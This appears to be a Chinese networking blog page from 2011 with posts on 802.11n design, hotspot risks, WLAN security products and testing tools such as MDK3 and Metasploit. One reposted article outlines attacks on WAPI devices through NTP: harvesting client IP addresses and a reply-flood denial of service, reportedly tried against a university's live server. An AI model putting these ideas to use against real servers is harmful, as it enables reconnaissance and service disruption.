一些有着专业用途的笔记本电脑或早期的老式笔记本电脑,其自带的无线网卡设备很容易出现一些无线通信标准与目前局域网无线路由器使用的通信标准不相兼容的现象,这些现象由于平时我们很少碰到,因此具有很强的隐蔽性,我们在解决这类无线网络故障时很容易多走弯路,所以我们日后一定要对无线网卡设备的工作标准多加注意,一旦发现无线通信标准异常时,不妨尝试将其修改成兼容802.11g、802.11b等无线通信标准,相信这样就能解决这些无法无线上网的故障。
Wireless N.T | Tags: , | 0 , 1035 Ķ
Feb
1
2011
在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA来实现对Internet的接入。但是,安全专家认为,随着雇员们经常在无线热点登录,他们将会在不知不觉中将个人及企业的数据暴露出去。虽然目前这种危险还没有兴风作浪,但是由于越来越多的单位依赖于笔记本电脑、PDA设备、智能电话,无线灾难的降临也是迟早的事。

其实,IT可以采取一些措施,保护用户在免受无线热点的危险。例如:

1、对于那些试图访问公司网络的设备而言,企业应当建立并强化强健的认证策略。

2、在雇员进行连接并交换数据时,要求雇员使用公司的VPN。此外,还要设置雇员的计算机,使其自动连接到VPN,并对数据加密。

3、确保所有的设备和软件都配置正确,并安装最新的补丁。

4、确保公司的安全策略防止员工将敏感数据传输到移动设备或未授权的计算机。

5、不使用热点的无线连接,而是使用无线网卡。

在无线热点发生的数据泄露难以发现,且这种数据往往是通过电子邮件进出这些所谓热点的。所以,对于从事商业的人来说,理解保护自己的责任是非常重要的。

多数雇员并不知道

虽然许多技术人员明白这些漏洞的风险,但安全人员认为普通员工并没有得到明确的通知,这会使得许多珍贵的数据易受攻击。

这种困难不太容易克服,因为用户们需要移动性。他们希望使用任何移动设备在无线热点访问电子表软件或幻灯片。但是,仅仅一台有漏洞的或配置错误的笔记本电脑就足以使整个公司名誉扫地。

其实,并不是某种特定设备导致问题,而是多种因素的组合使得数据保护成为无线热点的重要问题。

问题之一就是热点自身,无线连接甚至有线互联网连接都可成为危险区域。危险在于公共访问点。风险在于管理员无法控制的网络上。在用户位于公共网络上时,就像没有保护上网一样。此时,你并不知道你的邻居是谁。

不加密的信息在流经这些公共的网络时,那些别有用心的人就可以看到。笔记本电脑、智能电话和PDA等可以与位于公共热点上的其它人通信,甚至在用户并不强求这样做时,也能与对方聊天。

记住,在你与他人共享网络的任何时间,在你的机器与他人彼此共享时,攻击者就可以截获任何人的信息。
Wireless N.T | Tags: , | 0 , 718 Ķ
Jan
25
2011
如今任何人部署和设计无线局域网都应该会使用802.11n无线接入点。这不仅仅是价格可以和11a/g相匹敌,而且由于11n的可及范围使得室内空间需要的无线接入点更少。虽然一些电池供电的设备还没销售出去,但是大部分新客户也还是选择了11n产品。总之,除非是商业需要否则肯定买11n产品。

当你要设计802.11n无线局域网时,最佳实践是难以捉摸的:

◆信道结构:几乎所有的产品都会用多信道来创建微蜂窝,但至少会有两家供应商使用一个单信道来创建一个大的RF层。很明显,当用户移动时后者会减少漫游时间,但权衡取舍仍存在着激烈的争议。

◆分发控制:在集中控制的无线局域网中802.11n显示出了低效和瓶颈。小控制器难于应付高吞吐量,向一个控制器打开所有隧道会导致延时,并且扩展端到端Qos会很难。为得到最佳效果,当分配实时Qos和安全控制任务给AP时需要集中化管理和可见性。

◆回程能力:一个完全使用11n的AP可能产生比11a/g更大的流量。当需要更多的吞吐量时,可检测10/100以太网交换机和回程链路来升级以太网。

不管IP包如何在网络中流动,当他们到一个AP,就会被打包到11n帧中通过无线电传送。这儿,RF网络很明显需要设计来满足无线覆盖范围,吞吐量和程序的需求。

◆波段选择:如果可以,2.4GHz波段只给11g客户端使用;5GHz的一部分给11a客户端,一部分给新的11n客户端。这样操作可以减少干扰并且承载更大吞吐量(包括40MHz绑定信道)但是需要购买只有双波段的11n客户端。

◆信道部署:分配5GHz信道以满足不同程序的需求。比如,分配静态20MHz UNII-1信道给语音,给手机一个可靠的扫描列表。分配UNII-2/2e信道只给数据和可以容许动态频率选择的文件传输程序。绑定5GHz信道给需要承载高吞吐量的程序,比如HD视频。千万别绑定2.4GHz信道。

◆AP置入:早期的AP经常是凭经验放置,但是多路径导致11n蜂窝形成缺口并且随着时间而变化。让无线局域网规划师来估计11n AP数量以及如何放置来满足设计目标。为求最佳效果,要考虑建筑物对RF的影响。为了使你的计划跟得上发展,用基于5GHz的双波段AP来代替2.4GHz蜂窝。可以考虑定向天线来有效地填补覆盖上的缺口像长走廊或楼梯井。

◆设计目标:要让AP方案一直满足应用感知目标。比如,一般建议将10%到20%蜂窝重叠的最小信号强度——67 dBm用做语音。当选择蜂窝大小时,考虑到大蜂窝可最小化漫游——适合延时敏感的程序,但是小蜂窝适合高密集的地方如教室。即便是用自动配置的AP发射功率时,选择最大的来匹配最弱(通常为传统)客户端的发射功率。

虽然专家们议论了11n现场勘测的好处,但是测量拥护者建议在部署后期来测量其符合802.11n设计最佳实践。结合下行和上行链路,有效地测量技术也可以用在11n上。最后,必须测量真实客户端设备上的应用程序性能,因为802.11n的客户端非常广泛,根据用户使用经验,信号强度不一定总是可信任的。
Wireless N.T | Tags: , , | 0 , 852 Ķ
Jan
24
2011
802.11n可实现多要求的移动应用部署,同时它也是一个成熟的里程碑,很多客户乐于大规模地部署无线网络,甚至来替换以太网(Ethernet)。这种扩张大大增加了无线安全及无线安全服务对业务的重要性。VAR(增值经销商)和系统集成商可以通过提供更有效且更具规模的WLAN安全解决方案,包括基于云的服务来很好地利用这一市场需求。

802.11n安全的可用性

由于WLAN会争夺有限的未授权频谱,无线电射频(RF)干扰的减少对于确保可用性以及减少拒绝服务事件来说非常重要。现在,我们不讨论信号强弱问题,而是寻找使用率较高的频率,从而避免其被完全占用。免费的"stumblers"(计算机测试软件)可以让我们更加轻松地观测当前被占用的Wi-Fi频道情况,但很少有客户知道如何使用RF频谱分析仪。这就提供了许多的市场机遇,大大带动了例如Fluke AnalyzeAir、Metageek Wi-Spy、或Wi-Fi Sleuth等移动频谱分析仪的使用。

RF干扰无时无刻不在变化,但是,大多数不希望系统出现停机状况的客户也许会倾向于购买RF频谱分析仪,然后找VAR(增值经销商)来培训。但是例如来自Aruba, Cisco, Meru及Motorola的有些新产品,已经建立了一种可选择的交付模式:销售带有频谱分析功能的无线AP。云服务,甚至可以通过这些AP设备向供应商运营服务器做出有关RF的报表,诸如Meru的 E(z)RF Spectrum Manager 或Cisco的 MSE CleanAir Technology。

无线安全服务:控制WLAN访问

新802.11n设备集合了诸如802.11a/g设备——WPA2这种长距离Wi-Fi认证设备的安全功能。但是,当802.11n设备配置较陈旧,选项较弱(诸如WPA-TKIP 或 WEP)时,802.11n设备就无法达到较高的吞吐量(>54 Mbps)。此外,随着各企业组织逐渐大规模地在网络中实施无线覆盖访问,他们对未授权的无线网络使用情况越来越敏感。因此,通常认为升级802.11n是提供并加强WLAN安全的最好方式。

客户期望WPA2-PSK和 WPA2-802.1X能够被纳入WLAN基础架构。但经销商可通过提供互为补充的认证和网络访问控制产品来实现客户的期望。例如,AP设备和控制器可执行802.1X认证,但是一个802.1X-capable RADIUS服务器需要完整的事件描述。VAR们长期出售RADIUS服务器,诸如Cisco的ACS或Juniper的SBR,但是远程办公室和SMB或许不需要现场RADIUS服务器或员工来做支持。这一空白市场也许会由基于云的802.1X认证服务来填补。

网络访问控制存在着更有利的机遇。NAC产品与802.1X及RADIUS相吻合,增加的预连接扫描机制可确保Wi-Fi客户端的合规性,并能够拒绝或隔离不具合规性的客户端。但是对于不同的客户端来说将NAC整合到大型网络中也有不同的烦恼。WLAN升级是实现在一个简单孤立的地点部署NAC的机会,并能够帮助客户在体验NAC好处时感受更好的无线访问扩展体验。

无线入侵检测和防御

客户希望对流氓AP检测,如WPA2等可以嵌入到WLAN基础设施中。为了规避风险——尤其是在零售行业、医疗保险行业以及金融服务行业——客户可能会发现流氓扫描并不能够有效地检测及阻止广泛的威胁。这将为集成的或第三方无线入侵防御系统 (WIPS)的销售带来机会。

集成的WIPS更容易销售;将普通的AP设备转换为专用的传感器可用来监测无线通信中可能存在的威胁,包括未授权AP及攻击者进行DoS、探针或渗透WLAN。第三方WIPS(如 AirMagnet, AirTight)使用特制的传感器来检测并响应分散的的恶意客户端攻击。当今,大多数产品都有所突破,举例来说,Motorola AirDefense就可以部署在专用的Motorola AP当中。VAR可能希望通过部署若干个WIPS来满足不同WLAN供应商及多样化的客户需求。

从传统上来说,VAR已经销售过第三方WIPS服务器应用程序和传感器,或集成的WIPS软件,安装在WLAN控制器或管理应用程序中。基于云的WIPS最为吸引人的是购买之前的试用成本较低,或者说它是一种永久的解决方案:把WLAN划分为数百个小型WLAN来监测(如,零售行业)。

802.11n安全威胁的调查与调整

无论WLAN控制器是否报告无线安全事件,一个集成的WIPS或第三方WIPS,都会在无线侧检测时被发现,WLAN运营商需要取证工具(forensic tools)和专门的技术来评估事件的影响水平。WIPS能够提供实时的Wi-Fi设备踪迹,历史定位以及详细的事件日志说明。专用的WIPS传感器通常可以被装在数据包捕获模式中来记录进行中的攻击。

在某些调查中,移动Wi-Fi 数据包捕获和分析工具都是不可或缺的。一些客户都比较乐于使用免费的,或开源工具,如WireShark 或Airodump-NG。而其他客户则倾向于购买商用Wi-Fi流量分析工具,这样在大型WLAN中可以节省不少时间,同时还能得到更专业的洞察力。VAR通常会销售一些分析工具,如AirMagnet Analyzer 、WildPackets OmniPeek,用于WLAN故障排除和诊断,这些工具同样可以被安全人员所用。商业机遇同样为销售新型易用的Wi-Fi分析仪敞开了大门,因为这样的销售方式更加简单,也更能够迎合第一线的员工使用。

最后,VAR和系统集成商可能需要考虑提供更主动的无线安全服务和产品。例如,VAR可以按照Motorola AirDefense Wireless Vulnerability Assessment 模块的方式来销售Wi-Fi vulnerability assessment offerings (按照软件模块或云服务来销售)。系统集成商也可以在使用有效结论时,结合免费工具如 BackTrack4,寻找其自身的Wi-Fi深入测试服务方式。

无线安全服务——永无止境

虽然802.11n 引发了WLAN升级和扩容,并希望能够刺激无线安全市场,但其结果并不是短期内就能够看到的。安全性问题对客户来说并非一次性就能永久解决的。它是一个循序渐进的过程,它需要对新威胁和漏洞保持持久的警戒。这是VAR和系统集成商不断的收入来源。
Jan
24
2011
今天看了一篇文章《攻击WAPI无线认证设备的一个思路》觉得不错,特分享下!

全文地址:http://bigpack.blogbus.com/logs/100304856.html
引用文章:
     我们都知道,国内WAPI无线认证 是为运营级的通信运营商设计开发的。通信运营商要对基站工作的切换、漫游等都需要精确的时间控制,因此时钟同步问题对于移动通信的重要性不言而喻。而 WAPI 恰恰是为全国漫游的无线网络准备的。所以,也许其它手段对于 WAPI 设备来说并不足以受到严重危害,但特定的针对NTP服务的攻击,对于 WAPI 设备却是可能造成严重不良影响的手段之一。
      NTP 协议全称网络时间协议( Network Time Procotol )属于应用层协议(基于 UDP 传输,使用的端口号为 123 ),用来同步网络中分布式时间服务器和客户端之间的时间,使网络中的设备提供基于统一时间的应用成为可能。它的目的是在国际互联网上传递统一、标准的时间。 NTP 的具体实现方案是在网络上指定若干时钟源网站,为用户提供授时服务,并且这些网站间应该能够相互比对,提高准确度。其中,作为时间服务器和客户端都是相对的。一般来说,提供时间标准的设备为时间服务器,接收时间服务的设备为时间客户端。设备运行 NTP 之后,通过交换 NTP 报文,既可以作为时间服务器提供时间标准,又可以作为时间客户端接收时间服务。下面给出几个攻击思路,(PS: 对应的英文是自己想的,应该符合安全行业定义,大家凑合看吧)
类型1、 NTP Client Infomation Disclosure Attack(NTP 客户端信息泄露攻击)
     在默认情况下, NTP 服务器允许用户查询更多的资料。比如使用特定的诊断工具就可以获得从 NTP 服务器上进行时间更新的最近 600 个客户端 IP 地址。换句话说,就是使用一个请求方式,你就可以得到一个中型网络中的所有IP地址。若是有一个NTP服务器被放置在 DMZ 中,则外部攻击 者将可能获得内部网络的全部IP地址。
     为了方便大家理解,举个简单的例子,我先在一个中小型企业内部网络环境中搭建了一台 NTP 服务器提供 NTP 服务。如下图 所示,通过一个改进的Python脚本, 成功地 获取到了从该NTP服务器上进行更新的全部客户端记 录。这有什么意义?嘿嘿,自己想想。
点击在新窗口中浏览此图片
类型2、 NTP Reply Flood Attack(NTP 特殊回复报文洪水/DDOS攻击)
如下图 所示为针对 日本福冈大学 NTP 的发包测试,目标 NTP 完美地回复了 500 多条客户端更新数据。通过使用数量庞大的客户端配以特殊的算法不间断地重复发送测试报文,即可在单位时间内使得 NTP 服务达到一个请求处理的峰值,从而引发 CPU 过载、服务点击在新窗口中浏览此图片
其它还有NTP欺 骗攻击、时间延时攻击等等.
Jan
21
2011
802.11n协议

新兴的 802.11n 标准具有高达 600 Mbps 的速率,是下一代的无线网络技术,可提供支持对带宽最为敏感的应用所需的速率、范围和可靠性。802.11n 结合了多种技术,其中包括 Spatial Multiplexing MIMO (Multi-In, Multi-Out) (空间多路复用多入多出)、20和 40MHz 信道和双频带 (2.4 GHz 和5 GHz),以便形成很高的速率,同时又能与以前的 IEEE 802.11b/g 设备通信。

多入多出(MIMO)或多发多收天线(MTMRA)技术是无线移动通信领域智能天线技术的重大突破。该技术能在不增加带宽的情况下成倍地提高通信系统的容量和频谱利用率,是新一代移动通信系统必须采用的关键技术。


802.11n技术MIMO和OFDM介绍

802.11n专注于高吞吐量的研究,计划将无线局域网的传输速率从802.11a和802.11g的54Mbps增加至108Mbps以上,最高速率可达320Mbps甚至500Mbps。这样高的速率当然要有技术支撑,而OFDM技术、MIMO(多入多出)技术正是关键。

OFDM技术是多载波调制(Multi-CarrierModulation,MCM)的一种,它曾经在802.11g标准中被采用。其核心是将信道分成许多进行窄频调制和传输正交子信道,并使每个子信道上的信号频宽小于信道的相关频宽,用以减少各个载波之间的相互干扰,同时提高频谱的利用率的技术。

OFDM还通过使用不同数量的子信道来实现上行和下行的非对称性传输。不过OFDM技术易受频率偏差的影响,存在较高的峰值平均功率比(PAR),不过可以通过时空编码、分集、干扰抑制以及智能天线技术,最大程度地提高物理层的可靠性,802.11g中虽也采用有相似技术,但相比802.11n中与MIMO技术的结合,自然逊色不少。

802.11n技术阵营合作发展

802.11n标准上有两大技术阵营,即WWiSE(World Wide Spectrum Efficiency)联盟和TGn Sync联盟,目前,802.11n工作组已经向前发展并采纳了一个由扩展无线联盟(EWC)整合的 组合方案,该扩展无线联盟(EWC)是由Broadcom,Intel和其他Wi-Fi供应商领导的行业组织。802.11n 1.0版草案是两方面的方案的有力结合 ,已经被IEEE采纳,现在正在被这个工作组为最终的采用而进行仔细的检查。

其中WWiSE获得了德州仪器、Broadcom、 Conexant、 STMicro、 Airgo和Bermai的支持,而此前曾提交自有标准的摩托罗拉也加入了这一阵营 ;TGn Sync的支持者则包括英特尔、Atheros、Agere、英飞凌、思科、高通、北电网络、三菱、索尼、松下、飞利浦、三星、三洋和东芝。 WWiSE以目前获得全球采用的20 MHz通道格式为基础,世界各地已有超过数千万部Wi-Fi装置正在使用此格式,这种方法不但确保现有Wi-Fi产品 获得支持,还可以改善Wi-Fi网络在指定频带内的工作效能。除此之外,联盟厂商也代表了组成Wi-Fi市场的半导体供应和消费领域重要交集, 这将在发展厂商和最终产品制造商之间建立起坚强的合作关系。

就技术层面而言,WWiSE建议案标示着802.11实作功能的重大进步,主要特点包括:

强制使用已经核准、现已存在且全球适用的20MHz Wi-Fi通道宽度,确保它在任何电信法规要求下都能立即使用和布署。

更强的MIMO-OFDM技术,它是在2×2组态配置和一个20 MHz通道的最低要求下达到135 Mbps最大数据速率、进而降低实作成本的关键。这种 技术还能大幅改善简单的天线延伸或信道汇整技术。

利用4×4 MIMO架构和40 MHz通道宽度(只要主管单位允许)实现的540 Mbps最高数据速率,它能替未来的装置和应用提供持续发展的蓝图。

强制模式提供与5 GHz和2.4 GHz频带内现有Wi-Fi装置的向后兼容性与互用性,确保已安装的设备仍能获得强大支持。

先进的FEC编码功能帮助实现最大覆盖率和联机距离,它适用于所有的MIMO组态和通道带宽。

而TGn Sync联盟主要是采用两条MIMO天线,与40MHz信道协同使用,创造出能提供250Mbps带宽和可用吞吐量理论值为175Mbps的器件。WWiSE的 会员则提出,这将减少可用非重叠802.11信道的数量,在一些国家属于非法,例如日本。相反,该组织提议的技术使用四条MIMO天线,同时保 持目前802.11定义的20MHz信道。这种方法据称频谱效率更高,而且受到的管制障碍较少。802.11n的技术优势
802.11n专注于高吞吐量的研究,计划将WLAN的传输速率从802.11a和802.11g的54Mbps增加至108Mbps以上,最高速率可达320Mbps甚至500Mbps。这样高的速率当然要有技术支撑,而OFDM技术、MIMO(多入多出)技术等正是关键。

OFDM技术是MCM(Multi-Carrier Modulation,多载波调制)的一种,曾经在802.11g标准中采用。其核心是将信道分成许多进行窄带调制和传输正交子信道,并使每个子信道上的信号带宽小于信道的相关带宽,用以减少各个载波之间的相互干扰,同时提高频谱的利用率的技术。OFDM还通过使用不同数量的子信道来实现上行和下行的非对称性传输。不过OFDM技术易受频率偏差的影响,存在较高的峰值平均功率比(PAR),不过可以通过时空编码、分集、干扰抑制以及智能天线技术,最大程度地提高物理层的可靠性,802.11g中虽也采用有相似技术,但相比802.11n中与MIMO技术的结合,自然逊色不少。

MIMO(多入多出)技术是无线通信领域智能天线技术的重大突破,能在不增加带宽的情况下成倍地提高通信系统的容量和频谱利用率。MIMO系统在发射端和接收端均采用多天线(或阵列天线)和多通道。传输信息流S(k)经过空时编码形成N个信息子流Ci(k),i=1,……,N。这N个子流由N个天线发射出去,经空间信道后由M个接收天线接收。多天线接收机利用先进的空时编码处理能够分开并解码这些数据子流,这样,MIMO系统可以创造多个并行空间信道,解决了带宽共享的问题。802.11n天线数量可以支持到3*3,比802.11g的3增加了3倍。

将MIMO与OFDM技术相结合,就产生了MIMO OFDM技术,它通过在OFDM传输系统中采用阵列天线实现空间分集,提高了信号质量,并增加了多径的容限,使无线网络的有效传输速率有质的提升。

而为了提升整个网络的吞吐量,802.11n还对802.11标准的单一MAC层协议进行了优化,改变了数据帧结构,增加了净负载所占的比重,减少管理检错所占的字节数大大提升了网络的吞吐量。在天线上,智能天线技术的应用也解决了802.11n的传输覆盖范围问题。通过多组独立天线组成的天线阵列系统,动态地调整波束的方向,802.11n保证让用户接收到稳定的信号,并减少其它噪音信号的干扰,使无线网络的传输距离能够增加到几公里,移动性大大增强。

兼容性方面,802.11n采用软件无线电技术解决不同标准采用不同的工作频段、不同的调制方式,造成系统间难以互通,移动性差的问题。软件无线电是一个完全可编程的硬件平台,所有的应用都通过在该平台上的软件编程实现,换句话说,就是不同系统的基站和移动终端都可以由建立在相同硬件基础上的不同软件实现。软件无线电技术将根本改变网络结构,实现无线局域网与无线广域网融合并能容纳各种标准、协议,提供更为开放的接口,最终大大增加网络的灵活性。另外,802.11n工作模式包含2.4GHz和5.8GHz两个工作频段,保障了与以往的802.11a/b/g标准兼容,极大的保护了用户的投资。
Jan
17
2011
由于802.11n技术所实现的速度和可靠性,许多公司正开始使用带宽更大的无线LAN来支持新的移动服务。但是这个变化需要进行更复杂和更可靠的WLAN测试,以验证网络的安全性、连接性和性能。

公司可以不再需要使用耗费人力的工具来检查信号强度、服务器可访问性和Wi-Fi漏洞。测试在地理位置上分散的整个企业网络的成百上千的接入端(AP)和无数的客户端需要使用更高效的自动化工具和方法。

在许多早期的Wi-Fi部署中,安全性意味着检查整个建筑物或园区,监听陌生信号,以便发现未授权的恶意AP。这不仅极为低效,而且经常会“阻碍”许多识别错误的AP,也会忽视其他的一些威胁,如配置错误和操作不当的客户端。

使用具有无线入侵防御系统的AP进行全天监控

随着Wi-Fi越来越流行,许多AP经过更新后能够监听频道内或频道外的流氓信号。另外专门的Wireless Intrusion Prevention Systems (WIPS),也可用于全天监控无线攻击或违规行为,以及响应临时阻挡和发现嫌疑的流氓信号。

然而,这两个方法已经开始融合到一起。许多企业AP现在能够在需要时变成专职WIPS探测器,而且有几个AP供应商也提供了专用的WIPS设备。现在争论的重点越来越不在于扫描的频率,24/7是依赖无线的企业必须要求实现的。相反,合理的安全任务和符合规范要求则占据了核心地位。

集中的WLAN评估工具保证了规范性

为了符合像PCI DSS或Federal Information Security Management Act (FISMA)这样的规范,组织必须证明安全控制的有效性,并记录嫌疑违反规范的情况。现在,许多商业WIPS和一些WLAN管理器能够根据流行的行业规范产生封闭的规范报告,但是仍然需要持续地评估这些安全性控制和政策。

许多公司都雇佣第三方审计人员到现场执行评估;例如,要在一个商店中验证PCI DSS规范。然而,在进行这个审计之前,我们最好先测试一些有问题的地方,然后在它们暴露之前修复 这些问题。理想情况下,这些自我评估应该定期进行,而且不会消耗太多的员工时间,不需要太多的现场调查费用。

这正是集中评估工具发挥作用的地方。例如,AirTight Networks使用基于云的WIPS与上述探测器通信来实现每季度的PCI扫描和修复服务。这些探测器会监听邻近的流量,并探测Cardholder Data Environments (CDEs)的无线漏洞,从而产生PCI DSS 1.2规范所要求的月扫描报告(至少)。

对于那些已经部署了WIPS的公司而言,像Motorola AirDefense提供的无线漏洞评估模块等插件能够将部署的探测器变成远程测试引擎,它们能够周期性地连接AP,探测暴露的端口和URL,并生成记录结果的报告。

自动的远程安全性扫描,不管是由本身的WIPS执行,或者是云服务实现,都能够实现廉价的常规自我评估。然而,它们并不能替代不定期的人工现场渗透测试。

非自动化WLAN测试——渗透测试

查找可能淹没客户端、AP和WLAN管理器的盲点、错误和新攻击是WLAN测试的重要组成部分。然而,这种无线测试还没有实现完全的自动化。

例如,MDK3是一个命令行工具,它可用于猜测隐藏的SSID和MAC ACL,寻找客户端的认证漏洞,并发送802.11 Beacon、Deauth和TKIP MIC DoS攻击。审计人员可以使用MDK3方便地在不同的位置发起这些渗透测试,如办公室内部和外部。然而,诸如MDK3等工具绝不应该在工作时间内对生产环境WLAN执行测试,因为生产使用需要人工指引和结果解释。

集中的渗透测试工具经常可用于发现影响WLAN安全性的较上层的系统漏洞。例如,Metasploit脚本能够尝试许多不同的有线和无线LAN应用程序。如果要对一个大型网络执行更高效的Metasploit测试,我们可以考虑Rapid7的Metasploit Pro,它可以从一个中央控制台执行多层次的远程渗透测试。
Wireless N.T | Tags: , | 0 , 811 Ķ
Jan
17
2011
分页: 1/3 第一页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]